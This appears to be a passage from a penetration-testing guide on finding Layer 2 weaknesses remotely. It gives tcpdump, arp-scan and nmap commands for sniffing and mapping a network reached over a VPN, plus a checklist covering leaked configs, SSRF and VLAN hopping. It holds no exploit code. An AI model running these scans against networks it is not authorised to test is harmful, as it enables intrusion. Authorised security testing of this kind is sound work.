# Check for leaked internal data
# Search GitHub, pastebin for config files
# Look for exposed CDP/LLDP info in Shodan

Phase 3: If VPN Access Granted

# Only test IPs in scope
# Start with passive reconnaissance
sudo tcpdump -i tun0 -c 1000 -w vpn_capture.pcap

# Analyze traffic patterns
wireshark vpn_capture.pcap

# Map the internal network. tun0 is a Layer 3 (TUN) interface with no Ethernet
# framing, so arp-scan and the other Layer 2 tools cannot run across it; they need
# a TAP/bridged VPN (tap0) or a host on the segment. On a TUN VPN fall back to an
# in-scope Layer 3 sweep instead.
sudo arp-scan --interface tap0 --localnet
sudo nmap -sn -e tun0 192.168.1.0/24

Finding Layer 2-Related Bugs Remotely

  1. Web Application Vulnerabilities

    • Look for internal IP disclosure
    • Check for network device web interfaces
    • Find configuration file leaks
  2. Information Disclosure

    • Search for MAC addresses in HTML comments
    • Look for switch configurations in backups
    • Check for CDP/LLDP info in error messages
  3. Network Segmentation Bypass

    • Test for SSRF to internal network
    • Check for exposed internal services
    • Look for VLAN hopping through web apps
